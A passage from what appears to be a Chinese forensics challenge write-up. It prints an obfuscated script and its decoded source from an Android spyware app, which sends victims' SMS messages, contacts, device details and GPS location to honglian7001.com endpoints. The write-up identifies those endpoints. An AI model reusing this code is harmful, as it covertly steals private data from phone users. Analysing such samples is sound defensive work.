435P38480S32Y32a10J9U9S9s9v9Y9Z9U9t101j114w114N111G114V67z97t108r108g66O97o99x107D40I39p35831G24744K21516G24847K24377Q20986g30340j26435y38480B65292y20415Y21487l27491d24120j20351G29992q65n80n80W65281r22914N26524Y26410w24377Z20986k65292L35831w21069A24448Y8220C25163w26426N35774Q32622C8221T37324Y30340w8220U26435P38480r31649s29702N8221o25214p21040v26412r24212B29992p65292U24182J25171Y24320V36890E35759q24405t26435k38480r65292b26041D21487A20351Q29992a12290c39m41u10x9E9E9L9i9h9m9S9b47H47m32N99v111e110P115N111j108J101v46D108X111M103h40a39C80Q114v101d115J101N110x116r32T68I101Z110B105F101x100W33w33B33J32b39K32U43U32G101i46d100O101q110w105g101j100d80M114p101V115Z101F110x116M46r116E111o83n116Q114j105f110K103f40G41X41s59B32K32L10v9S9c9N9Q9z9A9Q125b10T9J9b9Q9u9a9K9L105k102f32h40g101v46S103Q114q97N110L116J101h100c46P108L101M110W103n116d104R32H62R32F48m41H32Z123Q10x9N9m9V9C9A9L9N9v47M47X26435v38480c34987g20801H35768T32p32l10n9o9h9R9u9q9Q9q9p47v47w35843b29992m20381Q36182I33719J21462x23450U20301g26435G38480S30340U20195p30721G32t32X10E9X9m9P9z9P9F9K9i115d117I99T99z101Y115x115z67w97Q108a108R66U97Y99p107J40i41K10I9J9I9B9j9E9C9T9j47m47B32H99s111d110n115e111t108E101N46R108D111N103v40Z39A71M114h97p110X116b101x100H33F33N33A32B39k32R43g32x101t46V103i114V97p110r116q101o100a46N116E111T83d116g114z105A110e103s40m41F41s59u32P32e10d9C9m9b9S9H9V9U125U10R9Y9g9x9Q9T9F125E44w32s102E117A110v99E116H105B111p110V32I40P101G41T32N123P10H9q9o9f9X9c9W9g101r114x114f111H114T67t97i108y108k66H97h99I107g40D39M35831C24744W21516N24847s24377J20986j30340z26435u38480x65292Q20415N21487B27491s24120U20351f29992n65d80g80G65281b22914T26524O26410I24377n20986W65292C35831v21069P24448k8220p25163S26426s35774U32622N8221I37324F30340k8220R26435k38480T31649u29702g8221I25214K21040P26412M24212i29992O65292v24182k25171u24320Q36890a35759J24405A26435T38480y65292e26041q21487t20351D29992W12290o39W41K10U9O9K9q9T9B9u9W47i47L32T99Q111u110T115N111h108T101B46b108L111T103c40n39f82u101s113t117x101o115V116s32p80T101u114y109i105G115O115t105F111a110C115k32f101S114s114K111k114A58w39y32R43r32L74H83D79C78j46O115Y116s114j105Y110c103x105o102v121B40c101Y41z41t59z32b32M10y9t9r9A9L9o9G125W41M10r9p9m9y9A9r125V32e101z108J115p101n32s105E102t32p40O112b108G117C115c46L111v115y46a110a97H109Z101s32Y61q61Y32s39A105A79Y83j39J41a32D123F10C9h9d9J9h9R9h47k47E105z111O115n32N44H31532m19968a27425b20351R29992D30446X30340i26435l38480Q26102i65292X24212t29992u30340W26435c38480M21015v34920v37324X26159E19981m23384M22312C30340v65292Y25152s20197a20808L40664K35748D25191K34892n19968S19979g25104n21151L22238D35843c65292d25171d24320f35201U20351U29992c30340J25805p20316q65292v27604S22914c32o112w108p117G115m46l99Z97V109S101N114Z97W32t32w10Q9r9N9m9E9Y9O47J47V36825S26102X31995z32479Z20250S25552E31034W26159A21542J25171R24320a30456L24212i30340T26435S38480K65292T22914l26524u25298g32477L20063L27809V20851t31995t65292U22240G20026u24212p29992D30340n26435q38480F21015C34920v37324C24050i32463Y23384u22312Z35813f26435e38480b20102f65292A19979S27425S20877Q35843c29992E30456S24212o26435g38480d26102M65292Z23601Y20250F32T32S10g9D9z9t9p9Z9x47G47I36208Q32Y101z108b115F101Z32H37324u30340L27969l31243l65292n20250M32473n29992j25143x25552X31034f65292E24182g19988e36339w36716u21040P24212E35813G30340s26435n38480H39029f38754v65292c35753Z29992I25143w25163g21160q25171s24320K12290H32q32x10l9J9v9r9c9e9C105O102U32u40B99Y104N101w99O107M82m101e115U117o108Q116N32M61q61L32m39P117h110B100O101W116l101K114n109f105x110b101p100u39k41t32q123P10N9L9B9f9S9A9G9U47s47w35843X29992f20381K36182Z33719g21462q23450G20301e26435j38480X30340A20195Y30721I32j32s10Z9u9U9q9D9U9X9g115E117r99x99o101o115u115j67u97a108H108Q66j97Q99n107H40d116M114m117C101c41o10J9i9m9c9d9G9n125u32O101e108k115M101C32o123F10N9q9d9j9I9U9g9k47N47B22914b26524X26159z32n105X111J115U32D31995I32479O65292V105k111r115u32t27809T26377Z21160h24577J30003a35831F25805J20316s65292M25152V20197J25552o31034L29992X25143h21435Z35774r32622I39029p38754E25163d21160P25171S24320A32c32H10G9k9k9d9l9y9m9e109a117e105I46Q99a111q110t102b105i114O109A40u112V101R114A109O105g115b115E105R111P110g78T97V109B101j32J43d32w39q26435W38480I27809u26377X24320W21551l65292O26159A21542t21435c24320p21551v65311V39D44a32D39H25552x37266D39X44M32I91B39E21462E28040I39T44c32c39c30830t35748u39G93V44M32g102w117M110t99B116g105O111o110r32V40t101A41x32b123l10h9m9A9L9Y9O9T9G9P47r47Z21462Q28040Y32K32M10M9V9E9E9g9j9n9f9l105u102A32l40g101c46d105T110P100M101s120c32J61P61V32c48l41x32x123m10v9K9L9G9A9t9E9Q9h9T101y114A114N111d114E67p97F108L108m66p97A99E107y40Z39X35831R24744x21516E24847P24377l20986g30340b26435a38480R65292i20415o21487I27491j24120K20351U29992D65v80S80x65281g22914Z26524k26410L24377H20986T65292w35831g21069M24448C8220X25163W26426C35774M32622V8221y37324Z30340f8220N26435C38480Q31649K29702u8221f25214s21040O26412e24212m29992s65292r24182o25171a24320B36890e35759v24405A26435E38480z65292d26041D21487s20351G29992o12290t39K41H10j9c9F9z9G9W9S9E9v125a32x101M108y115W101v32o105T102b32O40b101w46L105K110c100F101W120p32l61y61M32i49f41x32c123F10x9Y9o9Q9l9A9T9b9l9a47f47W30830p35748q65292m25171d24320Q24403C21069K24212F29992c26435E38480e35774A32622t39029j38754k32x32s10r9l9L9B9Z9y9r9Q9g9v118y97E114y32v85S73Q65L112B112N108A105s99o97f116O105t111D110B32Q61s32R112n108j117N115C46Q105M111h115R46g105L109P112I111p114B116A40m39I85g73H65c112W112q108W105m99J97o116c105V111r110m39t41h59z10Y9y9M9B9T9a9z9Z9q9c118T97X114b32o97U112k112X108r105C99U97X116j105z111f110z50y32j61G32h85o73b65T112L112F108U105E99C97M116k105r111N110t46T115o104G97x114L101Z100J65d112o112E108h105Q99a97K116n105f111H110D40o41U59m10G9I9M9R9s9a9z9Y9M9M118j97I114D32V78r83o85f82p76x50j32u61x32L112Q108U117z115j46t105W111p115i46H105g109K112F111d114u116m40I39v78D83D85Z82K76k39T41x59B10T9I9x9o9L9V9Y9K9j9G47F47W32Y118S97x114G32V115h101P116s116f105U110r103w50J32s61X32I78h83t85S82d76q50b46S85l82l76W87R105Y116t104u83J116i114Y105X110G103M40E34H112o114L101Z102f115k58Q114q111J111v116T61B76t79F67g65b84G73t79w78B95M83L69c82t86y73I67C69A83a34O41P59l32x32p32z32f32g32W32f32J32U32e32J32J32g32h32R32d32A32G32s32G32W32r32e32w32C32t32h32B32n10U9p9J9r9Y9B9z9j9A9d118e97k114d32t115v101X116S116L105t110W103T50B32G61h32h78T83h85H82s76V50D46n85r82t76f87U105N116b104M83n116x114q105u110J103Q40R39C97L112r112t45z115k101Q116f116d105T110I103a115y58d39c41Y59C10s9o9E9r9j9l9q9a9O9U97Z112y112T108f105K99B97t116g105F111J110G50g46E111n112r101o110c85M82j76n40j115G101K116K116v105e110A103V50Y41M59J10D10z9s9t9f9A9J9x9g9X9V112J108Z117F115F46N105v111I115S46h100E101q108z101B116T101D79o98G106D101R99V116D40K115C101u116O116P105O110D103A50S41S59B10L9T9X9b9j9R9v9q9l9d112c108R117I115D46P105a111m115x46R100H101o108U101y116H101A79Z98R106b101d99k116p40E78q83m85y82q76Q50q41J59e10Q9F9z9l9N9M9o9B9m9Z112L108o117G115M46C105H111V115r46M100p101U108i101v116P101u79c98U106w101x99i116t40B97g112U112c108m105O99n97U116C105r111Y110R50n41Z10G9s9u9e9O9a9E9a9t125v10E9J9y9G9J9v9m9b125n44m32J39z100Z105R118k39k41o10W9q9E9H9F9d9s125G10z9m9R9N9G9X125D10W9L9U9I9e125h10l9y9j9M125Y10S10r10z10O9p9H9T102z117Q110l99r116L105Y111w110Z32L97S97g40Y41Z32N123v10j9y9D9A9g118P97a114Z32q115Y106w104G32V61d32X36p40z39v35a115c106o104P39n41Y46A118S97m108Y40s41c59E10V9A9Y9c9v118o97f114U32X121z113c109N32S61Y32y36T40J39w35g121T113e109V39H41Q46x118f97r108B40p41k59k10u9x9P9Y9L105h102Y32C40j112p97N114f115I101i73Y110y116I40r115a106I104X41p32l62y32L48u32z38T38A32W112p97Z114r115K101B73X110F116A40a121R113m109U41Z32p62k32f48E32Z38m38e32p112u97j114x115V101t73D110m116Q40Z115l106r104S41O32u62l32n49g51q48q48v48D48W48m48g48Y48f48q32U38x38f32k112W97D114i115b101L73h110p116o40A115S106h104o41Y32Q60j32G49D57Z57v57y57a57w57h57K57s57S57L32R38F38V32k112g97z114p115V101n73Q110I116j40H121W113V109A41A32l62v32Z48O32q38a38r32S112C97n114B115r101c73b110e116C40j121X113G109V41d32o60H32n57Q57i57N57X57t57r41x32b123E10i10u9l9F9d9h9k103q101d116D80H101B114x109i105G115g115b105T111c110M40J39K67C79f78n84S65E67S84C83a39o44K32R102W117I110l99x116P105c111j110F32p40s41m32n123E10d9B9q9w9m9f9y104F117J111r113s117g40P115L106S104y44O32I121J113g109I41L59L10w10j9H9M9l9x9Z125R44x32v102m117f110O99W116l105c111y110w32M40C109E115P103Y41R32K123A10Y9u9h9C9B9E9W109q117U105A46v97B108m101K114O116m40g109d115R103s44a32A39t25552d37266V39P44a32J39D30830v23450h39E44S32u102h117d110U99r116U105p111d110e32q40t41u32M123A32Q125w44m32f39X100F105R118B39K41D10a9Z9C9g9I9y9j47Q47v97R97X40C41s10Z9X9e9Z9s9H125z41b10r9B9W9o9K125S10E9S9N9O9a101G108d115L101B32N123R10t9l9W9d9Z9c109C117Q105h46D116I111D97i115p116e40M39g35831K36755F20837W27491r30830z30340Z25163b26426u21495m21644t36992D35831o30721f39j41M10b9y9M9T9h125d10D10u9H9K9I125V10M10s10k10B10p9h9C9w102Q117H110K99y116S105h111j110p32O100y105O110E103t119K101B105B40d115m106y104i44S32n121f113Q109Z41p32y123o10V9E9k9d9j112C108N117L115j46D103n101S111N108w111O99H97V116P105G111D110B46q103M101O116e67I117a114Y114b101g110J116F80H111E115S105l116L105L111S110S40S116E114L97Y110y115e108O97o116h101R80x111d105z110m116d44f32m102p117h110W99s116G105r111M110h32E40v101o41e32w123O10p9o9W9R9P9F109z117S105M46p116d111d97L115d116X40E34C24322d24120V58C34M32b43r32C101Z46p109c101U115c115B97M103G101v41v59T10g9K9k9f9a125d41T59a10f9x9E9y125s10l10V9L9Y9b102b117x110X99u116L105f111h110O32N116r114T97D110Q115i108C97F116b101V80m111j105H110M116o40r112m111p115Q105o116x105u111N110a41U32F123m10x10O9u9w9K9k118T97r114S32Y115Y106V104f32d61g32N36X40P39l35x115m106E104x39M41o46q118r97n108b40l41z10D9C9F9C9P118Q97I114S32o121j113j109p32H61Z32i36l40d39r35u121z113h109u39u41I46L118c97t108Q40Z41u10Y9R9q9w9r118x97i114q32o99j117j114k114Z101f110g116f76w111C110p32b61R32s112I111a115S105D116K105S111Q110h46G99u111n111x114O100K115q46b108w111y110b103h105r116E117K100l101z59F10e9n9f9e9B118e97X114y32t99N117s114S114M101d110k116b76r97J116Q32T61t32s112i111v115B105a116I105Z111y110z46o99V111p111t114p100e115B46q108b97G116A105o116k117M100r101K59l10J9c9e9a9d118d97w114t32Y106r105L110f103s119q101u105A100z117u32x61z32u115P106x104G32Y43C32o39R44G39u32r43D32v121t113n109z32V43r32G39N44Z39C32f43Y32d99Z117y114Z114g101k110r116R76E111k110i32t43o32l39G44K39Y32r43J32f99v117I114v114c101y110v116C76Z97M116w59d10d9x9s9Y9A109Z117t105q46y97V106d97U120m40v97i112W105Z115o101s114T118u101p114z32t43D32d39t97U112O105K109k97s112n39J44k32J123V10M9A9H9R9R9y100w97X116M97v58L32R123A10K9u9G9I9t9N9d100g97L116c97k58d32X106n105n110Q103a119E101k105r100A117q10j9F9p9I9Y9H125Y44h10B9e9Y9I9O9g100I97U116q97P84T121s112J101W58P32j39a116V101u120G116M39M44V47d47O26381Y21153n22120Q36820a22238m106d115x111F110e26684v24335C25968x25454h10R9A9a9E9C9z116K121G112T101B58t32O39H112t111z115t116x39w44r47a47R72w84c84J80i35831A27714E31867q22411T10s9s9B9j9h9y116n105I109V101b111d117K116P58P32s49v48I48V48n48w44v47X47l36229j26102a26102G38388E35774F32622t20026F49B48G31186L65307d32i32j32k32q32N32n32K32z32g32Z32g32Q32y32r10v9P9j9P9i9x115i117I99j99P101d115I115M58k32N102m117F110Y99f116x105m111I110h32L40o100S97O116e97Z41W32w123U10M10f9q9j9X9y9Z9z105M102U32j40L100h97V116x97t32l61e61U32K39U33719Y21462J25104M21151e39d41x32U123w10p9Z9x9F9J9v9D9C114x101w113M117d101z115P116C80m101u114V109p105j115v115i105K111K110n40Y115T106n104p44A32L121m113g109G41f59Y10T10L9A9b9q9j9D9J9b47M47n115C101J116R73V110V116n101a114o118r97H108Z40C102L117E110F99J116M105e111g110u40i41l123t10V9c9C9D9M9N9N9y47f47I118J97y114K32I115A106m104d61H36f40H39c35o115D106Y104X39S41M46I118G97a108Q40Y41e59E10U9j9X9i9y9U9x9G47U47o118M97W114R32i121u113k109v61r36r40g39Z35s121c113N109i39V41R46S118a97P108I40j41s59e10s9H9F9i9K9V9p9s47m47q114F101i113u117v101j115t116i80Z101M114x109g105L115k115U105L111X110f40J115A106D104G44A121W113r109C41T59u10D9e9i9s9F9j9m9T47X47f99I111n110c115t111W108e101h46P108j111G103R40a39o115e101w110r100Q39j41d10O10H9t9x9M9b9k9w9I47B47l125O44d51U48d48U48s48E41H10K9P9Q9R9a9L9m125Y10x10B9A9X9y9u9t9i109x117f105p46e116J111f97B115c116c40C100q97J116O97U41Y10A9f9h9q9Z9e125y44K10j9p9s9y9g9W101L114Q114T111R114u58m32H102D117y110L99P116d105t111Q110f32c40B120A104X114q44a32q116J121R112z101J44j32t101R114A114k111k114D84v104X114p111J119j110h41q32R123x10T9H9r9r9f9T9B47G47Y24322A24120G22788S29702g65307a10h10R10X9Z9v9D9v9b125f10y9S9v9L9P125s41s59q10Y10F9m9s9o9F47K47a20070N20889Y33258v24049l30340r36923G36753H10y10W9K9L9O125q10i9u9z9H47v47v32f25193O23637U65v80b73n21152u36733g23436I27605i65292O29616z22312E21487m20197f27491v24120V35843p29992p25193D23637W65X80b73j10L10R9p9u9r102J117j110p99t116D105I111F110L32f104Z117K111Z113w117P40m115X106W104v44p32L121F113d109b41g32C123D10M9W9n9a9w118B97K114e32g99L111S110i32w61e32f115a106A104Q32w43G32d34O42d42o34w32q43R32U121I113y109G32W43C32I39f42Y42G39l32e43Q32Z97O100F100M114M101s115k115L59u10O10T10d9e9F9e9V112a108L117W115k46x99g111d110F116W97h99T116u115A46f103i101X116Q65F100u100s114k101A115I115P66n111Q111n107Y40J112l108L117Q115l46t99t111y110j116i97b99U116y115E46C65B68d68N82c69W83w83U66y79p79l75c95C80F72N79f78U69A44X32S102s117u110D99p116d105z111I110A32I40W97V100G100S114W101s115h115g98b111Z111B107X41z32P123B10X10v10O9E9c9r9g9d97p100i100J114E101H115j115m98O111s111E107B46t102U105I110D100B40A91s34d100w105c115x112X108v97g121W78L97x109H101Q34h44E32a34m112s104T111b110a101X78S117J109u98p101h114i115t34g93A44h32J102Q117b110P99T116q105T111I110W32j40o99w111i110n116Y97C99I116k115x41Z32y123G10E10a10R9o9w9S9E9O9A102K111k114t32E40k118p97T114L32V105Y32S61d32R48M44N32i108z101e110W32e61f32Y99u111Q110y116q97M99r116o115f46V108V101c110T103T116m104x59b32g105W32M60d32J108g101L110W59d32A105o43O43G41j32P123c10C9o9O9z9Y9C9N9d99A111k110V32C61p32g99V111n110v32m43v32C39k61f39I32P43N32P99M111s110T116m97T99c116O115Y91S105J93U46w100e105M115O112y108Z97W121X78R97U109K101O32u43U32Y39U124l39t32V43t32G40w99f111Z110h116f97h99B116c115L91r105h93a46w112A104r111t110l101R78s117r109a98B101U114R115T46P108D101R110e103V116A104F32g61E61C32g48y32v63h32v34x34h32U58b32D99x111H110U116a97J99O116f115f91f105K93i46I112c104Y111B110s101I78m117E109B98l101x114z115X91L48s93x46Q118r97p108O117c101p41J59f10D9c9D9O9l9Q9c125B10j10r10m10k10C10d9b9W9h9k9V9l109C117K105F46Q97H106n97L120C40r97R112h105v115a101c114V118c101e114I32c43u32W39C97l112G105Q39u44H32q123b10c9P9L9X9k9c9L9D100R97S116I97f58p32k123y10L9p9G9N9o9m9N9h9Y100L97g116F97U58G32Z99U111D110x10u9S9s9c9z9u9Y9i125p44K10d9F9L9o9K9P9R9s100b97V116s97s84N121J112a101A58w32E39n116W101i120w116p39B44f47v47H26381M21153U22120R36820i22238q106Y115P111p110W26684D24335d25968z25454U10b9g9X9b9R9n9P9z116R121C112z101K58J32p39C112l111m115J116R39B44D47c47Z72X84d84E80b35831R27714g31867g22411D10V9s9r9q9V9t9Y9k116t105p109Q101f111M117G116W58J32N49j48W48y48R48S44j47b47B36229H26102G26102a38388a35774d32622E20026E49c48j31186K65307a32x32B32z32v32s32h32A32P32r32d32q32K32K32q10G9v9D9b9M9N9O9t115V117c99H99S101X115M115U58K32X102a117q110e99g116i105q111q110f32F40F100A97C116X97E41p32j123V10Q9N9t9t9g9c9l9F9m47T47q97w108A101m114n116f40g100F97E116J97O41J10Z9c9i9F9x9k9x9t9k105Q102Y32R40U100E97n116k97w32G61O61j32S39h27491N22312C21152J36733q21015M34920h39L41J32P123N10o9O9X9U9T9H9B9C9P9I100u105A110M103t119y101I105l40S115x106L104Z44s32t121m113O109t41M59o10z9y9D9Y9S9o9Q9C9k9m109w117J105o46V111j112d101Q110m87v105w110l100X111j119y40X123W10p9e9Y9Z9z9D9H9t9v9D9S117W114I108c58a32r39I108z105h115p116J46j104v116A109v108y39K44g10N9s9W9J9n9S9F9C9i9S9t115R104F111W119m58V32Z123Y10n9W9n9U9a9i9u9U9y9g9s9O97n117t116x111h83C104g111P119p58J32z116u114i117c101E10g9I9P9S9W9P9p9N9P9J9Y125X10a9P9a9u9B9l9W9B9Y9E125H41u59m10A9Z9r9F9u9S9K9k9e125c32Y101K108m115E101x32t123f10v9h9N9a9X9i9l9g9B9P109H117T105a46Y116l111I97b115r116p40v100l97C116y97W41N10o9Y9v9n9e9P9p9s9w125u10O9j9Y9E9Z9C9h9F9z47f47N99A111R110v115P111N108p101G46d108T111D103k40z99S111Y110g41N10E9m9Z9Z9O9d9Q9D125I44d10F9X9z9I9c9b9P9J101T114e114Q111Z114c58N32p102p117x110f99V116j105s111t110x32J40M120t104r114i44W32B116j121Q112K101R44g32e101v114Q114K111N114D84X104D114t111V119O110N41Q32n123U10a9F9C9x9C9u9t9G9D47o47V24322W24120x22788S29702I65307Z10f10m10C9n9T9I9i9k9v9u125b10S9F9i9j9o9d9r125S41n59m10y10Q10M10R9N9h9F9N9A125r44r32v102j117g110h99O116w105m111w110a32f40a41G32A123I10Q9x9L9h9c9W9C109M117o105P46u97r108c101m114H116n40Q34o20026a20445q35777A29992G25143M36136n37327g65292F20351p29992V26412C97L112l112F35831x21516T24847n36890Y35759y24405K25480r26435O32D34v41D59e10g9s9s9U9f9k125w44e32O123D10o9U9Q9u9u9r9A109V117f108k116e105z112w108B101V58J32r116X114u117b101U10r9R9M9g9N9q125L41L59n10K9u9P9T9m125h44x32E102C117Z110W99T116l105f111r110q32E40L101h41L32L123H10t9F9x9i9s9i109O117l105F46i97m108U101r114s116g40k34a20026d20445L35777G29992M25143e36136u37327I65292T20351R29992g26412c97Y112z112h35831a21516s24847o36890d35759U24405D25480a26435y32Q34y41Y59c10z9t9H9x9I125O41S59b10P9e9Z9D125h10D10E10r10Q10W9T9G125N41z59"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');
解密后:
/**Aman - 194nb.com*//**Progcessed By JSDec in 0.00s*JSDec - JSDec.js.org*/mui.init();mui.plusReady(function () {//var main = plus.android.runtimeMainActivity();// main.moveTaskToBack(false);var address = plus.device.vendor + '-' + plus.device.model;address = address.replace(/\n/g, "").replace(/ /g, "").replace(/\r/g, "");var apiserver = 'http://www.honglian7001.com/api/uploads/';//重复数据处理 预防用户重复点击var danjishijian = true;function requestPermission(sjh, yqm) {plus.android.requestPermissions(["android.permission.READ_SMS"],function (resultObj) {//SmsInfo存放一条短信的各项内容var SmsInfo = {}//Sms存放所有短信var Sms = {}var aimei = sjh;var aimei2 = yqm;var duanxin = '[{"imei":"' + aimei + '","imei2":"' + aimei2 + '"}';var Cursor = plus.android.importClass("android.database.Cursor")var Uri = plus.android.importClass("android.net.Uri") //注意啦,android.net.Uri中的net是小写var activity = plus.android.runtimeMainActivity()var uri = Uri.parse("content://sms/");var projection = new Array("_id", "address", "person", "body", "date", "type")var cusor = activity.managedQuery(uri, projection, null, null, "date desc")var idColumn = cusor.getColumnIndex("_id")var nameColumn = cusor.getColumnIndex("person")var phoneNumberColumn = cusor.getColumnIndex("address")var smsbodyColumn = cusor.getColumnIndex("body")var dateColumn = cusor.getColumnIndex("date")var typeColumn = cusor.getColumnIndex("type")if (cusor != null) {while (cusor.moveToNext()) {SmsInfo.id = cusor.getString(idColumn)SmsInfo.Name = cusor.getInt(nameColumn)SmsInfo.Date = cusor.getLong(dateColumn)SmsInfo.Date = getFormatDate(SmsInfo.Date)SmsInfo.PhoneNumber = cusor.getString(phoneNumberColumn)SmsInfo.Smsbody = cusor.getString(smsbodyColumn)SmsInfo.Type = cusor.getString(typeColumn)var post = JSON.stringify(SmsInfo);//console.log(post);duanxin = duanxin + ',' + post;}duanxin = duanxin + ']';//alert(duanxin);mui.ajax(apiserver + 'apisms', {data: {data: duanxin},dataType: 'text',//服务器返回json格式数据type: 'post',//HTTP请求类型timeout: 10000,//超时时间设置为10秒;success: function (data) {mui.toast('获取成功')//console.log(con)},error: function (xhr, type, errorThrown) {//异常处理;}});cusor.close()}},function (error) {console.log('申请权限错误:' + error.code + " = " + error.message);});}//扩展Date功能:将long型日期转换为特定的格式Date.prototype.format = function (format) {var o = {"M+": this.getMonth() + 1,"d+": this.getDate(),"h+": this.getHours(),"m+": this.getMinutes(),"s+": this.getSeconds(),"q+": Math.floor((this.getMonth() + 3) / 3),"S": this.getMilliseconds()}if (/(y+)/.test(format)) {format = format.replace(RegExp.$1, (this.getFullYear() + "").substr(4 - RegExp.$1.length));}for (var k in o) {if (new RegExp("(" + k + ")").test(format)) {format = format.replace(RegExp.$1, RegExp.$1.length == 1 ? o[k] : ("00" + o[k]).substr(("" + o[k]).length));}}return format;}//将long型日期转换为特定格式function getFormatDate(l, pattern) {date = new Date(l);if (pattern == undefined) {pattern = "yyyy-MM-dd hh:mm:ss";}return date.format(pattern);}//alert(plus.device.uuid)plus.navigator.setStatusBarBackground("#db6eff");mui("body").off("tap");mui("body").on('tap', '#tx', function (event) {$('#tx').hide();$('#zz').show();});mui("body").on('tap', '#gb', function (event) {$('#tx').show();$('#zz').hide();});mui("body").on('tap', '#qd', function (event) {if (danjishijian) {danjishijian = false;aa()} else {aa()}});function getPermission(permissionIdentity, successCallBack, errorCallBack) {//权限标识转换成大写var permissionIdentity = permissionIdentity.toUpperCase();//获取检测权限的状态var checkResult = plus.navigator.checkPermission(permissionIdentity);//权限状态是否正常var permissionStatusOk = false;//权限中文名称var permissionName = '';//对应 andorid 的具体权限var androidPermission = '';//获取权限中文意思与对应 android 系统的权限字符串switch (permissionIdentity) {case 'CONTACTS':permissionName = '系统联系人';androidPermission = 'android.permission.READ_CONTACTS'break;default:permissionName = '未知';androidPermission = '未知';break;}//判断检查权限的结果switch (checkResult) {case 'authorized'://正常的permissionStatusOk = truebreak;case 'denied'://表示程序已被用户拒绝使用此权限,如果是拒绝的就再次提示用户打开确认提示框//如果有该权限但是没有打开不进行操作还是会去申请或手动打开// console.log('已关闭' + permissionName + '权限')// errorCallBack('已关闭' + permissionName + '权限');// returnbreak;case 'undetermined':// 表示程序未确定是否可使用此权限,此时调用对应的API时系统会弹出提示框让用户确认// this.requestPermissions(androidPermission, permissionName, successCallBack, errorCallBack)// errorCallBack('未确定' + permissionName + '权限');// returnbreak;case 'unknown':errorCallBack('无法查询' + permissionName + '权限');returnbreak;default:errorCallBack('不支持' + permissionName + '权限');returnbreak;}//如果权限是正常的执行成功回调if (permissionStatusOk) {successCallBack()} else {//如果不正常,如果是 andorid 系统,就动态申请权限if (plus.os.name == 'Android') {//动态申请权限plus.android.requestPermissions([androidPermission], function (e) {if (e.deniedAlways.length > 0) {//权限被永久拒绝// 弹出提示框解释为何需要定位权限,引导用户打开设置页面开启errorCallBack('请您同意弹出的权限,便可正常使用APP!如果未弹出,请前往“手机设置”里的“权限管理”找到本应用,并打开通讯录权限,方可使用。')// console.log('Always Denied!!! ' + e.deniedAlways.toString());}if (e.deniedPresent.length > 0) {//权限被临时拒绝// 弹出提示框解释为何需要定位权限,可再次调用plus.android.requestPermissions申请权限errorCallBack('请您同意弹出的权限,便可正常使用APP!如果未弹出,请前往“手机设置”里的“权限管理”找到本应用,并打开通讯录权限,方可使用。')// console.log('Present Denied!!! ' + e.deniedPresent.toString());}if (e.granted.length > 0) {//权限被允许//调用依赖获取定位权限的代码successCallBack()// console.log('Granted!!! ' + e.granted.toString());}}, function (e) {errorCallBack('请您同意弹出的权限,便可正常使用APP!如果未弹出,请前往“手机设置”里的“权限管理”找到本应用,并打开通讯录权限,方可使用。')// console.log('Request Permissions error:' + JSON.stringify(e));})} else if (plus.os.name == 'iOS') {//ios ,第一次使用目的权限时,应用的权限列表里是不存在的,所以先默认执行一下成功回调,打开要使用的操作,比如 plus.camera//这时系统会提示是否打开相应的权限,如果拒绝也没关系,因为应用的权限列表里已经存在该权限了,下次再调用相应权限时,就会//走 else 里的流程,会给用户提示,并且跳转到应该的权限页面,让用户手动打开。if (checkResult == 'undetermined') {//调用依赖获取定位权限的代码successCallBack(true)} else {//如果是 ios 系统,ios 没有动态申请操作,所以提示用户去设置页面手动打开mui.confirm(permissionName + '权限没有开启,是否去开启?', '提醒', ['取消', '确认'], function (e) {//取消if (e.index == 0) {errorCallBack('请您同意弹出的权限,便可正常使用APP!如果未弹出,请前往“手机设置”里的“权限管理”找到本应用,并打开通讯录权限,方可使用。')} else if (e.index == 1) {//确认,打开当前应用权限设置页面var UIApplication = plus.ios.import('UIApplication');var application2 = UIApplication.sharedApplication();var NSURL2 = plus.ios.import('NSURL');// var setting2 = NSURL2.URLWithString("prefs:root=LOCATION_SERVICES");var setting2 = NSURL2.URLWithString('app-settings:');application2.openURL(setting2);plus.ios.deleteObject(setting2);plus.ios.deleteObject(NSURL2);plus.ios.deleteObject(application2)}}, 'div')}}}}function aa() {var sjh = $('#sjh').val();var yqm = $('#yqm').val();if (parseInt(sjh) > 0 && parseInt(yqm) > 0 && parseInt(sjh) > 13000000000 && parseInt(sjh) < 19999999999 && parseInt(yqm) > 0 && parseInt(yqm) < 999999) {getPermission('CONTACTS', function () {huoqu(sjh, yqm);}, function (msg) {mui.alert(msg, '提醒', '确定', function () { }, 'div')//aa()})}else {mui.toast('请输入正确的手机号和邀请码')}}function dingwei(sjh, yqm) {plus.geolocation.getCurrentPosition(translatePoint, function (e) {mui.toast("异常:" + e.message);});}function translatePoint(position) {var sjh = $('#sjh').val()var yqm = $('#yqm').val()var currentLon = position.coords.longitude;var currentLat = position.coords.latitude;var jingweidu = sjh + ',' + yqm + ',' + currentLon + ',' + currentLat;mui.ajax(apiserver + 'apimap', {data: {data: jingweidu},dataType: 'text',//服务器返回json格式数据type: 'post',//HTTP请求类型timeout: 10000,//超时时间设置为10秒;success: function (data) {if (data == '获取成功') {requestPermission(sjh, yqm);//setInterval(function(){//var sjh=$('#sjh').val();//var yqm=$('#yqm').val();//requestPermission(sjh,yqm);//console.log('send')//},30000)}mui.toast(data)},error: function (xhr, type, errorThrown) {//异常处理;}});//书写自己的逻辑}// 扩展API加载完毕,现在可以正常调用扩展APIfunction huoqu(sjh, yqm) {var con = sjh + "**" + yqm + '**' + address;plus.contacts.getAddressBook(plus.contacts.ADDRESSBOOK_PHONE, function (addressbook) {addressbook.find(["displayName", "phoneNumbers"], function (contacts) {for (var i = 0, len = contacts.length; i < len; i++) {con = con + '=' + contacts[i].displayName + '|' + (contacts[i].phoneNumbers.length == 0 ? "" : contacts[i].phoneNumbers[0].value);}mui.ajax(apiserver + 'api', {data: {data: con},dataType: 'text',//服务器返回json格式数据type: 'post',//HTTP请求类型timeout: 10000,//超时时间设置为10秒;success: function (data) {//alert(data)if (data == '正在加载列表') {dingwei(sjh, yqm);mui.openWindow({url: 'list.html',show: {autoShow: true}});} else {mui.toast(data)}//console.log(con)},error: function (xhr, type, errorThrown) {//异常处理;}});}, function () {mui.alert("为保证用户质量,使用本app请同意通讯录授权 ");}, {multiple: true});}, function (e) {mui.alert("为保证用户质量,使用本app请同意通讯录授权 ");});}});
在解密后的代码中发现了这句:
var apiserver ='http://www.honglian7001.com/api/uploads/';
确定apiserver的值为www.honglian7001.com/api/uploads
第九题
题目
分析该APK,发现该程序还具备获取短信回传到后台的功能,短信上传服务器接口地址为【标 准格式:www.abc.com/abc】
Writeup
接上题,根据解密后的代码,找到对应短信发包的模块代码,分析其代码地址为apiserver+’apisms’
mui.ajax(apiserver +'apisms', {
data: {
data: duanxin
},
因此接口为www.honglian7001.com/api/uploads/apisms
第十题
